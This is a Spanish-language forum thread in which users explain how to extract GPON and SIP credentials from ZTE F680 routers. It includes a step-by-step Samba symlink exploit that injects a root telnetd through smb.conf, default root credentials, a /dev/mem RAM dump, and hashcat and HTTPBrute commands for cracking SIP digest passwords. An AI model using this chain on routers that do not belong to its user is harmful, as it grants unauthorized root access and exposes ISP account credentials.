[MANUAL]: Claves GPON, SIP y acceso al ZTE F680

Bonjour j'ai un ZTE F680 masmovil. je cherche le password pour pouvoir changer le SN merci
Haz el tutorial del primer post de esta pagina y despues esto:

Desde Linux, abriendo terminal y situándose en la ruta en que esté el archivo de volcado, se ejecuta el siguiente comando:

tr -cd '\11\12\15\40-\176' < ramf680.txt > ramf680-2.txt

y en esta linea esta la clave: adminadminIGD.AU5zteIGD.AU4publicrootIGD.AU312341234IGD.AU2XXXXXXadminIGD.AU1http://www.zte.comhttp://www.zte.com
 
Buenos días,
Finalmente he conseguido la clave SIP, usando dos herramientas:

1. En el fichero de volcado de ram del F680, vienen todos los datos necesarios menos la clave, que va encriptada usando algoritmo MD5 y Autentificación HTTP Digest RFC 1627.
Resumiendo, tenemos todos los datos menos la clave, que está encriptada a partir de los otros datos que sí aparecen en el volcado de memoria (También se pueden conseguir los datos analizando el tráfico con Wireshark volcado a un fichero).
Esos datos, en mi ISP Euskaltel/Ractel++ están de esta manera(He cambiado los datos, pero es la misma estructura):
Authorization: Digest username="+3493XXXXXX@ims.euskaltel.com",realm="ims.euskaltel.com",nonce="FC665645454645668888"",uri="sip:ims.euskaltel.com",response="6c89f7644d8f98df5923",algorithm=MD5,cnonce="97ccd27",opaque="cP34Y983356==",qop=auth,nc=0001000

2. Ahora que tenemos los datos, que vienen en el volcado, se debe utilizar un programa JAVA llamado HTTPBrute, no pongo el link, porque desconozco si está prohibido o no.
Cuando abres el programa, cumplimentas las casillas con los datos obtenidos, dejando en blanco las casillas de "Password" y "EntityBody". En el campo "Method" se debe teclear "REGISTER"
En las opciones del programa, puedes decirle la longitud en dígitos de la contraseña, si lo sabes.
Si no sabes la longitud de la contraseña, pones un intervalo, en mi caso entre 4 y 8 caracteres, con lo cual, tardará más en encontrar la contraseña.
Una vez que tienes todo cumplimentado, pinchas el botón "Crack" y a esperar que la encuentre.
Yo lo dejé ayer por la noche, y esta mañana la ha encontrado, pero ha tardado 8 horas largas.
No la he probado con el Zoiper porque tengo que ver qué parámetros son necesarios para configurar el Zoiper, en mi caso, si haces varios intentos de registro infructuosos, me bloquean la línea durante casi una hora.

** Todo este procedimiento lo he conseguido mirando webs de aquí y allá, pero mi ISP parece ser que utiliza un sistema de encriptado diferente, la contraseña no está visible, así que tengo que utilizar este método.
En vuestro caso, seguramente la contraseña puede venir sin encriptación en vuestro volcado de memoria, aunque lo desconozco.

Ante todo, gracias a todos por vuestras aportaciones a este hilo, y sobre todo, al creador del mismo.
Saludos cordiales.
Veo que lo has hecho hace poco compañero, puedes decirnos qué versión de hardware del f680 tienes y cómo has conseguido exactamente el fichero de volcado de ram? Sigue funcionando el truco del samba para la v4?

Yo tengo la v4 y me estoy volviendo loco para conseguirlo!
 
Veo que lo has hecho hace poco compañero, puedes decirnos qué versión de hardware del f680 tienes y cómo has conseguido exactamente el fichero de volcado de ram? Sigue funcionando el truco del samba para la v4?

Yo tengo la v4 y me estoy volviendo loco para conseguirlo!
Buenos días,
Pude hacer el volcado por el método Samba, tengo la V4.
Tienes la alternativa del Wireshark, pero te debería funcionar el Samba, cómo mínimo en mi caso funciona:
Bootloader: V4.0.10
Software: ZTEGF6804P3T7

Es relativamente más fácil sacar todo lo relacionado con ONT, pero lo más difícil es la contraseña SIP, porque en mi caso, viene protegida con redondillas/asteriscos en la página web de configuración del router y encriptada con protección MD5 en el fichero de volcado de RAM.
Cómo he comentado anteriormente, yo tengo Euskaltel/Racctel+, de manera que es posible que varíe alguna cosa.

Además del método para extraer la clave SIP que explico en mi anterior post, hay una forma, que podría ser más rápida, yo no la he probado, siempre y cuando tengas una tarjeta gráfica potente(o incluso dos en el mismo PC).
Es el programa Hashcat, que utiliza la GPU para agilizar la búsqueda de las passwords.
Es un método más difícil, porque se utiliza desde la línea de comandos, pero es más rápido si tienes una tarjeta gráfica potente.
Suerte con la búsqueda.
Saludos cordiales.
 
Buenos días,
Pude hacer el volcado por el método Samba, tengo la V4.
Tienes la alternativa del Wireshark, pero te debería funcionar el Samba, cómo mínimo en mi caso funciona:
Bootloader: V4.0.10
Software: ZTEGF6804P3T7

Es relativamente más fácil sacar todo lo relacionado con ONT, pero lo más difícil es la contraseña SIP, porque en mi caso, viene protegida con redondillas/asteriscos en la página web de configuración del router y encriptada con protección MD5 en el fichero de volcado de RAM.
Cómo he comentado anteriormente, yo tengo Euskaltel/Racctel+, de manera que es posible que varíe alguna cosa.

Además del método para extraer la clave SIP que explico en mi anterior post, hay una forma, que podría ser más rápida, yo no la he probado, siempre y cuando tengas una tarjeta gráfica potente(o incluso dos en el mismo PC).
Es el programa Hashcat, que utiliza la GPU para agilizar la búsqueda de las passwords.
Es un método más difícil, porque se utiliza desde la línea de comandos, pero es más rápido si tienes una tarjeta gráfica potente.
Suerte con la búsqueda.
Saludos cordiales.
Gracias por la respuesta. Mmmm interesante, yo he intentado lo de Samba pero no me ha acabado funcionando del todo, con el siguiente equipo:

Hardware version: V4.0
Software version: ZTEGF6804P1T13 (Es diferente, pero no sé exactamente decir si es posterior o anterior puesto que no usan semantic versioning al contrario del hardware y el boot loader. Pareciera anterior incluso por el P1 pero entonces debería no estar parcheado como en tu versión)
Boot Loader Version: V4.0.10

Lo que he hecho para el Samba es simplemente desde linux aplicar el symbolic link a la ruta correspondiente y desde windows 10 editar el archivo. No hago nada de busybox porque no le veo mucho sentido, ya que lo descargáis en el pen pero realmente para el volcado de memoria no usáis ninguno de sus comandos desde el samba ni nada, solo lo ponéis en una carpeta. Yo creo que esto viene de que en los primeros posts se utilizaba para ejecutar algún comando que podía no estar incluido en el linux del router pero para lo que estamos intentando hacer ahora no le veo mucho sentido (a lo mejor me estoy equivocando aquí y sirve para algo en concreto que se me está pasando?).

Total, la cosa es que creo el symlink (ln -s /var/samba/lib/smb.conf) pero al conectarlo al router y acceder desde samba en windows 10, el contenido de éste es distinto — no parece un archivo de configuración estándar de samba (https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html) si no que el contenido es el siguiente:

Código:
XSym
0023
b59808379df1587b947ad89e189a549d
/var/samba/lib/smb.conf
Ahora que lo veo otra vez, parece como si desde windows viera el archivo del symlink en sí pero no el archivo (por esto tiene la primera línea que parece un formato, la segunda los permisos o algo por el estilo, lo tercero la hash y lo cuarto la ruta del archivo). Parece literalmente el symlink en sí en vez del archivo al que apunta, cómo lo estáis haciendo para ver el archivo smb.conf al que apunta en vez del contenido del symlink en sí?

Claro, por eso lo edito desde windows 10 y realmente lo que estoy editando es el symlink, no el archivo al que apunta. Por eso no ejecuta ni lee ninguna configuración del archivo que cambio desde Samba.

Alguna idea alguien de por qué me sale el contenido del symlink, en vez del archivo al que apunta, desde windows10 ?

Edit. He encontrado la vulnerabilidad del samba que estamos explotando: https://www.samba.org/samba/security/CVE-2017-2619.html Es bastante antigua (2017) y la solución es muy sencilla: no permitir extensiones de unix. Me extrañaría que no lo hayan arreglado :rolleyes: Con wireshark podría ser.. pero el único momento en el que se me ocurre que el "router" que nos dan vaya a recibir la info necesaria es cuando lo da de alta el técnico, esa info se guarda dentro como estamos viendo, para qué la iba a volver a recibir de nuevo? O es que estáis insinuando que cada vez que se reinicia el router recibe toda la info de la ONT en vez de recibirla en su alta y guardarla para la posterioridad?

Un saludo!
 
Última edición:
Yo he conseguido por fin acceso admin al ZTE H367A, pero no se traga mis datos sip de Netelip, y no entiedo el motivo. Debo crear una vlan para voip? dónde puede estar el problema? No se loguea en el servidor.
Hola, Tengo el Router H367A - como has conseguido sacar los datos VOIP/SIP ?un saludo.
 
Hola, Tengo el Router H367A - como has conseguido sacar los datos VOIP/SIP ?un saludo.
Yo no uso la voz de mi operador (pepephone fibra no da voz), pero no conseguí que el H367A aceptara los parámetros de voz de netelip, no se conectaba al servidor, asi que sigo usando el ATA normal de siempre.
 
Buenos días a todos,

Aun estoy leyendo el hilo entero, pero me gustaría ir adelantando cosillas.

Gracias al manual posteado por aquí, he podido sacar la clave GPON.

Primera pregunta, desde el mismo archivo de volcado de ram, es posible sacar la clave SIP?
Segunda pregunta, soy de Jazztel, para instalar un router neutro, entiendo que necesito una ONT de por medio, es necesario que sea explicitamente una ZTE F601?
Siguiendo la misma pregunta, es necesario algun dato más para configurar correctamente la ONT aparte de clave GPON? EL SN ZTEG que aparece en la config del router?

Muchas reacias de antemano a todos,

Un saludo
 
Buenos días a todos,

Aun estoy leyendo el hilo entero, pero me gustaría ir adelantando cosillas.

Gracias al manual posteado por aquí, he podido sacar la clave GPON.

Primera pregunta, desde el mismo archivo de volcado de ram, es posible sacar la clave SIP?
Segunda pregunta, soy de Jazztel, para instalar un router neutro, entiendo que necesito una ONT de por medio, es necesario que sea explicitamente una ZTE F601?
Siguiendo la misma pregunta, es necesario algun dato más para configurar correctamente la ONT aparte de clave GPON? EL SN ZTEG que aparece en la config del router?

Muchas reacias de antemano a todos,

Un saludo
Depende de la OLT de tu central. Hay algunas ONT que tienen perfiles para varias OLT, salvo para las Nokia-Alcatel. Yo estoy en neba, y mi ONT es Nokia (pq la OLT a la que está conectado mi edificio es de Alcatel). No tengo forma de sustituirla por una propia (al menos de forma más o menos económica).
 
Depende de la OLT de tu central. Hay algunas ONT que tienen perfiles para varias OLT, salvo para las Nokia-Alcatel. Yo estoy en neba, y mi ONT es Nokia (pq la OLT a la que está conectado mi edificio es de Alcatel). No tengo forma de sustituirla por una propia (al menos de forma más o menos económica).
Gracias, según tu respuesta entiendo que la F601 no me valdría?

Desconozco la OLT de la central, de las primeras que instalaba jazztel...
 
Si tu router actual es un ZTE, la F610 te va a funcionar.

Saludos
Gracias!!!

De todas formas, me estoy pensando ya en ahorrar en comprarme la ONT, he visto que teniendo el password de GPON hay posibilidad de dejar la f680 solo en modo ONT y poner un router neutro. Lo único que me siembran un par de dudas, no tendrias dos lans? Desde f680 aunque no tenga lan ni wan hará un reroute to "router neutro" ?
 
Gracias!!!

De todas formas, me estoy pensando ya en ahorrar en comprarme la ONT, he visto que teniendo el password de GPON hay posibilidad de dejar la f680 solo en modo ONT y poner un router neutro. Lo único que me siembran un par de dudas, no tendrias dos lans? Desde f680 aunque no tenga lan ni wan hará un reroute to "router neutro" ?
Creo que no puedes poner el F680 al 100% en modo bridge, para hacer lo que dices. No obstante, inténtalo.
Sin embargo, a mi juicio, la opción de la ONT sigue siendo la mejor. Las tienes en wallapop por dos duros.

Saludos!
 
Muy buenas a todos. Soy nuevo en el foro y tan solo quería agradeceros vuestra inestimable ayuda.

Soy cliente de MasMovil desde Enero de 2020 y no tengo unos conocimientos muy avanzados de Linux. Traté de sacar las claves del GPON por conexión serie a mi ZTE F680 V40 T18 pero el acceso root no me funcionaba (root/root ; root/Zte521).

Con el método de volcado de RAM ya he conseguido tanto la password de mi GPON como el acceso de super user al router. Me resigno con el tema del SIP porque no me merece el esfuerzo para el uso que le doy (nulo).

Viendo el archivo de volcado de RAM, me queda la duda de si una de las claves (root/public) podría valer para la conexión serie. Esa clave la veo en la cadena donde se enumeran todos los "IGD.AU1; IGD.AU2; IGD.AU3;...". Pero creo que me quedaré con la duda porque no veo el momento de sustituir el ZTE F680 y ponerlo a reposar en un cajón. Además en mi caso solo conseguí que la consola de comandos por Telnet dejase de lanzarme texto restaurando el router a valores de fábrica y dándole tiempo a que se conectase a Internet (cosa que no quiero repetir porque desde el volcado de RAM parece que tengo más accesos por SAMBA).

Más allá de contaros este rollo y, como os comentaba, mi principal motivo era agradeceros enormemente todos vuestros esfuerzos e indicaciones. Ayer hicisteis muy feliz a este humilde usuario.

¡Saludos!
 
Muy buenas gente.

Hace tiempo, bastante, le metí mano a mi router y conseguí el acceso a todos los datos y habilité telnet sin problema.

Lo que pasa que ahora me estoy dando cuenta que Yoigo ha actualizado mi router y no puedo conseguir acceso por ttl y por lo que veo a gente creo que no funciona el método samba.

ahora mismo tengo esta versión

Software VersionZTEGF6804P1T18
Boot Loader VersionV4.0.10

Y como digo, con telnet habilitado pero sin usuario admin por web, se puede hacer algo para conseguir el usuario admin total para deshabilitar el TR-069?
 
Muy buenas a todos. Soy nuevo en el foro y tan solo quería agradeceros vuestra inestimable ayuda.

Soy cliente de MasMovil desde Enero de 2020 y no tengo unos conocimientos muy avanzados de Linux. Traté de sacar las claves del GPON por conexión serie a mi ZTE F680 V40 T18 pero el acceso root no me funcionaba (root/root ; root/Zte521).

Con el método de volcado de RAM ya he conseguido tanto la password de mi GPON como el acceso de super user al router. Me resigno con el tema del SIP porque no me merece el esfuerzo para el uso que le doy (nulo).

Viendo el archivo de volcado de RAM, me queda la duda de si una de las claves (root/public) podría valer para la conexión serie. Esa clave la veo en la cadena donde se enumeran todos los "IGD.AU1; IGD.AU2; IGD.AU3;...". Pero creo que me quedaré con la duda porque no veo el momento de sustituir el ZTE F680 y ponerlo a reposar en un cajón. Además en mi caso solo conseguí que la consola de comandos por Telnet dejase de lanzarme texto restaurando el router a valores de fábrica y dándole tiempo a que se conectase a Internet (cosa que no quiero repetir porque desde el volcado de RAM parece que tengo más accesos por SAMBA).

Más allá de contaros este rollo y, como os comentaba, mi principal motivo era agradeceros enormemente todos vuestros esfuerzos e indicaciones. Ayer hicisteis muy feliz a este humilde usuario.

¡Saludos!
Muy buenas a todos,

Deciros que era demasiado bonito para ser cierto... Me animé a probar el acceso por serie otra vez a ver si funcionaba la clave de "root/public" y nada más lejos.

Ahora tengo el ZTE F680 con valores de fábrica y he perdido el acceso de admin que se abrió después del volcado de RAM por SAMBA... 'nífico :p. Repetiré el proceso solo por dejarlo habilitado aunque su futuro (espero más pronto que tarde) sea reposar en un cajón.

Un saludo!
 
Creo que no puedes poner el F680 al 100% en modo bridge, para hacer lo que dices. No obstante, inténtalo.
Sin embargo, a mi juicio, la opción de la ONT sigue siendo la mejor. Las tienes en wallapop por dos duros.

Saludos!
Gracias! Tienes razón o soy demasiado pakete para configurar vlans en el wrt3200, o las dos cosas :D
Borrando VLANs que vienen pre-configuradas en router, des habilitando DHCP, el software de serie que trae linksys no quiere coger IP de ninguna manera.
Instalando OpenWrt veo que tengo algo más de posibilidades de configurar la VLAN , sin embargo, no hay manera de que funcione.

He mirado ya todos foros españoles y de guiris y no me quiero dar por vencido.

La táctica deshabilitando VLAN sin borrar Wan perfil de todo, tampoco funciona, lo digo por muchos tutoriales que hay en los foros con el ZTE 218.

Encontré un manual parecido al router que tengo yo, al de wrt1900, pero me sobran casillas, ya que tengo cpu eth0 y cpu eth 1 y desconozco si los dos tienen que estar en tagged :}
Clonado Mac tampoco me aporta el lease
 
Buenos días,
Finalmente he conseguido la clave SIP, usando dos herramientas:

1. En el fichero de volcado de ram del F680, vienen todos los datos necesarios menos la clave, que va encriptada usando algoritmo MD5 y Autentificación HTTP Digest RFC 1627.
Resumiendo, tenemos todos los datos menos la clave, que está encriptada a partir de los otros datos que sí aparecen en el volcado de memoria (También se pueden conseguir los datos analizando el tráfico con Wireshark volcado a un fichero).
Esos datos, en mi ISP Euskaltel/Ractel++ están de esta manera(He cambiado los datos, pero es la misma estructura):
Authorization: Digest username="+3493XXXXXX@ims.euskaltel.com",realm="ims.euskaltel.com",nonce="FC665645454645668888"",uri="sip:ims.euskaltel.com",response="6c89f7644d8f98df5923",algorithm=MD5,cnonce="97ccd27",opaque="cP34Y983356==",qop=auth,nc=0001000

2. Ahora que tenemos los datos, que vienen en el volcado, se debe utilizar un programa JAVA llamado HTTPBrute, no pongo el link, porque desconozco si está prohibido o no.
Cuando abres el programa, cumplimentas las casillas con los datos obtenidos, dejando en blanco las casillas de "Password" y "EntityBody". En el campo "Method" se debe teclear "REGISTER"
En las opciones del programa, puedes decirle la longitud en dígitos de la contraseña, si lo sabes.
Si no sabes la longitud de la contraseña, pones un intervalo, en mi caso entre 4 y 8 caracteres, con lo cual, tardará más en encontrar la contraseña.
Una vez que tienes todo cumplimentado, pinchas el botón "Crack" y a esperar que la encuentre.
Yo lo dejé ayer por la noche, y esta mañana la ha encontrado, pero ha tardado 8 horas largas.
No la he probado con el Zoiper porque tengo que ver qué parámetros son necesarios para configurar el Zoiper, en mi caso, si haces varios intentos de registro infructuosos, me bloquean la línea durante casi una hora.

** Todo este procedimiento lo he conseguido mirando webs de aquí y allá, pero mi ISP parece ser que utiliza un sistema de encriptado diferente, la contraseña no está visible, así que tengo que utilizar este método.
En vuestro caso, seguramente la contraseña puede venir sin encriptación en vuestro volcado de memoria, aunque lo desconozco.

Ante todo, gracias a todos por vuestras aportaciones a este hilo, y sobre todo, al creador del mismo.
Saludos cordiales.


Lo que me fijado que si busco por user name hay muchas veces que pone branch=letras i numero con un -. Seria esto la clava. HTTPBrute he probado 10 horas no da nada. He mirado que con el Hascat tambien se puede hacer i usar la gpu para accelerar el tema.
Alquien con experencia con el Hascat???


saludos
 
Lo que me fijado que si busco por user name hay muchas veces que pone branch=letras i numero con un -. Seria esto la clava. HTTPBrute he probado 10 horas no da nada. He mirado que con el Hascat tambien se puede hacer i usar la gpu para accelerar el tema.
Alquien con experencia con el Hascat???

saludos
Yo también estoy intentando sacar el password desde su md5. Tengo usado hashcat en el pasado. Esto es lo que estoy haciendo:

1. Creamos un fichero md5.txt donde ponemos el hash a crackear
2. Listamos los dispositivos
Código:
hashcat64 -I
3. Empezamos
Código:
hashcat64.exe --session md5sip --opencl-device-type 1,2 md5.txt -m 0 --force -a 3
(Cambiar 1,2 por los dispositivos que se listaron en el paso1 o con los que quieras usar. Yo tengo una máquina poco potente,
así que uso CPU y GPU)

Si quieres salir, puedes pulsar la tecla [c]heckpoint (tarda un poco en salir) y para continuar:

Código:
hashcat64.exe --session md5sip --restore
Si tienes varios md5, puedes ponerlos todos en el fichero md5... ahorras tiempo.

Si encuentra alguno para verlo:

Código:
hashcat64.exe --session md5sip --show
Hashcat es un mundo, si alguien sabe que patrón sigue el password se puede limitar los passwords que prueba.
 
Pasos para obtener la contraseña GPON mediante telnet del ONT integrado + Router ZTE F680 con el firmware v4, aprovechando el bug de Samba y realizando un volcado de la memoria RAM.

* En mi caso, el ISP es Pepephone. Mi línea no dispone de VoIP, por lo que en este post sólo hablaré de la clave GPON y no de la SIP.

Esto es un recopilatorio de todos los pasos que se encuentran disgregados en este y otros hilos de otros foros, especialmente dedicado a las personas que tengan la versión 4 del firmware. He realizado y verificado todos y cada uno de los pasos.

Requisitos:

- Un pendrive.
- Un ordenador con SO Linux (en mi caso usé una Raspberry con Raspbian).
- Un ordenador con SO Windows o un Linux con un cliente Samba instalado.
- Notepad++.

------------------------------------------------------------------------------------------

1. Formateamos el pendrive con sistema de archivos NTFS.

2. En el ordenador con Linux, enchufamos el pendrive formateado, abrimos un terminal, y nos situamos en la raíz del dispositivo (en Raspbian /media/pi/nombre_del_pen/).

3. Creamos un enlace simbólico que apuntará al fichero de configuración de Samba en el router, una vez el pendrive sea pinchado en él. Lo hacemos con el siguiente comando:

ln -s /var/samba/lib/smb.conf

4. Nos descargamos Busybox para MIPS y lo copiamos a la raíz del pendrive, renombrando el fichero con el nombre "busybox". Realizamos una segunda copia del fichero, también en la raíz del pendrive y la renombramos como "sh". Sí, dos archivos iguales, "busybox" y "sh".

* IMPORTANTE: Para que funcione en la V4, la versión de Busybox que debemos bajar es la busybox-mips (https://busybox.net/downloads/binaries/1.21.1/busybox-mips), a diferencia de la que se necesita para la V2, que es la busybox-armv7l (https://busybox.net/downloads/binaries/1.21.1/busybox-armv7l).

* Realmente sospecho que no tiene tanto que ver con la versión del ZTE, si no con su procesador, que es de arquitectura MIPS y no ARM. En el caso de los ONT + router con antenas internas de Pepephone, yo he necesitado la versión MIPS.

5. Una vez tenemos el pendrive con el enlace simbólico y los dos ficheros duplicados de busybox, procedemos a enchufarlo al puerto USB del ONT + router.

6. A través de la aplicación "Ejecutar" de Windows (tecla Windows + R) o del cliente Samba en Linux, accedemos al siguiente recurso compartido:

\\192.168.1.1

(suponiendo que esta sea la IP de vuestro router, en caso contrario, deberéis introducir la que sea.)

* IMPORTANTE: El cliente del protocolo SMB1 que utiliza este router viene capado en W10 y muchas distros de Linux, por seguridad, permitiendo sólo la utilización del protocolo SMB2.

Para activarlo en W10: Panel de Control --> Programas y características --> Activar o desactivar características de Windows --> Compatibilidad con el protocolo para compartir archivos SMB 1.0/CIFS --> Cliente SMB 1.0/CIFS.

Para activarlo en Linux: Google rulez.

Se nos abrirá una nueva ventana del explorador de ficheros, que mostrará el contenido del router que la configuración de Samba que hay en el router le dice a éste que tiene que mostrar. En este caso, será una carpeta llamada "samba", en cuyo interior se encontrará otra carpeta que contiene todo lo que el router comparte mediante este servicio (lo que hay en la carpeta "/mnt" del sistema de ficheros del router), en este caso, otra carpeta con la raíz del pendrive que hemos enchufado.

7. Gracias a que en el pendrive hemos creado un enlace simbólico al fichero de configuración de Samba en el router (smb.conf), si abrimos este enlace simbólico en el "Notepad++", accederemos al contenido del fichero. Necesitaremos reemplazar su contenido por lo siguiente:

[global]
guest account = root
deadtime = 5

log level = 0

server string = Samba Server
security = share
load printers = no
workgroup = workgroup
short preserve case = yes
preserve case = yes
netbios name = smbshare
preexec = /mnt/usb1_1/busybox telnetd -b 192.168.1.1:27 -l /mnt/usb1_1/sh

[samba]

comment = samba share dir

read only = no
guest ok = yes
guest only = yes
short preserve case = yes
preserve case = yes
max connections = 3
path = /mnt

[root]

comment = samba share root
read only = no
guest ok = yes
guest only = yes
short preserve case = yes
preserve case = yes
max connections = 3
path = /

* Es posible que debamos modificar la linea que contiene la ruta de ejecución de busybox. Dependiendo del router puede variar el nombre de la carpeta en la que se monta el pendrive; en mi caso se llama "usb1_1". Podéis comprobar el nombre de la carpeta en la barra de direcciones del Explorador de Archivos en el paso 6.

Guardamos el contenido fichero una vez lo hayamos modificado.

8. Volvemos a repetir el principio del paso 6 (ejecutando \\192.168.1.1) y se nos volverá a abrir el explorador de archivos, mostrando el contenido que comparte el router, valiéndose para esto nuevamente del servicio "Samba". Como hemos cambiado el contenido de su fichero de configuración, ahora veremos dos carpetas, "samba" (la que ya veíamos la primera vez) y "root". Esto indicará que el nuevo fichero de configuración se ha leído y aplicado.

9. Gracias a la instrucción "preexec" que hemos añadido en el fichero de configuración, al volver a ejecutar "Samba" en el paso anterior, también hemos lanzado un servicio telnet, con privilegios elevados, corriendo en el puerto 27. Pues bien, bien ejecutando un "telnet" mediante la consola de comandos (previamente activando el cliente "Telnet" en "Activar o desactivar características de Windows) o mediante una conexión Putty (más rápido y sencillo), lanzamos una conexión "Telnet" a la IP 192.168.1.1, apuntando al puerto 27. Nos pedirá las credenciales ("root"/"Zte521").

10. En este punto ya podremos ejecutar comandos con privilegios elevados en el router. Si usasemos el comando "sendcmd" para intentar extraer el password del "GPON", nos devolvería asteríscos en lugar de la contraseña, por lo que este método no nos vale. En lugar de ello, debemos volcar la memoria RAM del router (donde se encuentra la contraseña cargada en texto plano) a un fichero dentro del pendrive y después analizar éste para obtener la contraseña. El volcado lo haremos con el siguiente comando:

/bin/cat /dev/mem > /mnt/usb1_1/ramf680.txt

* Tardará unos minutos y puede que veáis un error "cat: Read error: Bad address". Ignoradlo, el fichero se generará correctamente igualmente.

11. Una vez tenemos el fichero, podemos comprobar que éste es monstruoso y completamente ininteligible, así que tenemos dos métodos para encontrar la contraseña:

a. Método Nayin:

Poner en el buscador: ÿÿÿì123456789
Buscar una coincidencia que vaya seguida de otro ÿÿÿìCLAVEGPON.
Ejemplo-> ÿÿÿì123456789 ÿÿÿìCLAVEGPON

* Algunas personas dicen que son 10 dígitos/letras, en mi caso son 8.

2. Método arm41:

Desde Linux, abrimos un terminal y nos situamos en la ruta en la que esté el archivo de volcado. Después ejecutamos el siguiente comando:

tr -cd '\11\12\15\40-\176' < ramf680.txt > ramf680-2.txt

Una vez hecho esto, abrimos el archivo nuevo ("ramf680-2.txt") y buscamos una cadena de texto como esta:

X`H123456123456789CLAVEGPON1ZTEG123456T`4`|123456 123456$``9``|TIGD.GPON`

donde "CLAVEGPON" será la contraseña

---------------------------------------------------------------

Yo he introducido esta clave como SLID de un Alcatel I-010G-U y se me ha quedado fija la luz de "Connection", cuando antes de ponerla parpadeaba. Estoy a la espera de modificar el firmware de mi router neutro para que permita manejar VLANs y terminar el proceso.

---------------------------------------------------------------

Muchas gracias a todos los miembros de la comunidad que han hecho su aportación. El conocimiento que he expuesto en este post es gracias a vosotros. ;)
 
Última edición:
Arriba